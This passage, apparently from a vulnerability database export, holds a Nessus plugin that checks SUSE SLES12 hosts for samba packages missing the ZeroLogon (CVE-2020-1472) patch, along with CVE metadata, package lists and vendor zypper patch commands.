"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-passdb0", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-util0", "p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamdb0", "p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient0", "p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:samba", "p-cpe:/a:novell:suse_linux:samba-client", "p-cpe:/a:novell:suse_linux:samba-client-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debugsource", "p-cpe:/a:novell:suse_linux:samba-libs", "p-cpe:/a:novell:suse_linux:samba-libs-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs-python3", "p-cpe:/a:novell:suse_linux:samba-libs-python3-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind", "p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2020-2720-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143655", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2720-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143655);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"SUSE SLES12 Security Update : samba (SUSE-SU-2020:2720-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\nUpdate to 4.10.18\n\nZeroLogon: An elevation of privilege was possible with some non\ndefault configurations when an attacker established a vulnerable\nNetlogon secure channel connection to a domain controller, using the\nNetlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-1472/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202720-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9b504ef0\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP5-2020-2720=1\n\nSUSE Linux Enterprise Server 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP5-2020-2720=1\n\nSUSE Linux Enterprise High Availability 12-SP5 :\n\nzypper in -t patch SUSE-SLE-HA-12-SP5-2020-2720=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP5\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc-binding0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc-binding0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc-binding0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-krb5pac0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-krb5pac0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-krb5pac0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-nbt0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-nbt0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-nbt0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-nbt0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-standard0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-standard0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-standard0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-standard0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libnetapi0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libnetapi0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libnetapi0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libnetapi0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-credentials0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-credentials0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-credentials0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-credentials0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-errors0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-errors0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-errors0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-errors0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-hostconfig0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-hostconfig0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-hostconfig0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-passdb0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-passdb0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-passdb0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-passdb0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-util0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-util0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-util0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-util0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamdb0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamdb0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamdb0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamdb0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbclient0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbclient0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbclient0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbclient0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbconf0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbconf0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbconf0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbconf0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbldap2-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbldap2-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbldap2-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbldap2-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libtevent-util0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libtevent-util0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libtevent-util0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libtevent-util0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libwbclient0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libwbclient0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libwbclient0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libwbclient0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-client-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-client-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-client-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-client-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-debugsource-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-python3-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-python3-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-python3-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-python3-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-winbind-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-winbind-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-winbind-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-winbind-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:23:08", "description": "This update for samba fixes the following issues :\n\n - ZeroLogon: An elevation of privilege was possible with some non default configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update project.", "cvss3": {}, "published": "2020-09-25T00:00:00", "type": "nessus", "title": "openSUSE Security Update : samba (openSUSE-2020-1513)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ctdb", "p-cpe:/a:novell:opensuse:ctdb-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-tests", "p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc0", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-devel", "p-cpe:/a:novell:opensuse:libndr-krb5pac-devel", "p-cpe:/a:novell:opensuse:libndr-krb5pac0", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt-devel", "p-cpe:/a:novell:opensuse:libndr-nbt0", "p-cpe:/a:novell:opensuse:samba-libs-python-32bit", "p-cpe:/a:novell:opensuse:samba-libs-python-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard-devel", "p-cpe:/a:novell:opensuse:libndr-standard0", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo", "p-cpe:/a:novell:opensuse:libndr0", "p-cpe:/a:novell:opensuse:libndr0-32bit", "p-cpe:/a:novell:opensuse:libndr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr0-debuginfo", "p-cpe:/a:novell:opensuse:libnetapi-devel", "p-cpe:/a:novell:opensuse:libnetapi-devel-32bit", "p-cpe:/a:novell:opensuse:libnetapi0", "p-cpe:/a:novell:opensuse:libnetapi0-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials-devel", "p-cpe:/a:novell:opensuse:libsamba-credentials0", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit", 